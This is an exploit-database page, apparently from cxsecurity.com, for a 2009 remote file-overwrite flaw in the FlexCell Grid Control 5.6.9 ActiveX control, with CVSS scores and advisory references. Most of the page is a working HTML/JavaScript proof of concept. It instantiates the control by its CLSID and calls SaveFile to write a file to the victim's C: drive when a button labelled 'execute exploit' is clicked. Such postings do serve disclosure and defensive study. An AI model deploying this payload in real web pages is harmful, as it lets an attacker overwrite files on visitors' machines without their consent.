FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit

2009.01.31
Credit: Houssamix
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<HTML> <BODY> <b> Author : Houssamix <br/> <br/> <br/> FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit <br/> ExportToXML() is vuln to <br/> <b/> <object id=hsmx classid="clsid:{2A7D9CCE-211A-4654-9449-718F71ED9644}"></object> <SCRIPT> /* Report for Clsid: {2A7D9CCE-211A-4654-9449-718F71ED9644} RegKey Safe for Script: Faux RegKey Safe for Init: Faux Implements IObjectSafety: Vrai IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data */ function hehe() { File = "c:\\hsmx.txt" hsmx.SaveFile(File) } </SCRIPT> <input language=JavaScript onclick=hehe() type=button value="execute exploit"><br> </body> </HTML>

References:

http://www.securityfocus.com/bid/33453
http://www.milw0rm.com/exploits/7868
http://secunia.com/advisories/33664


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top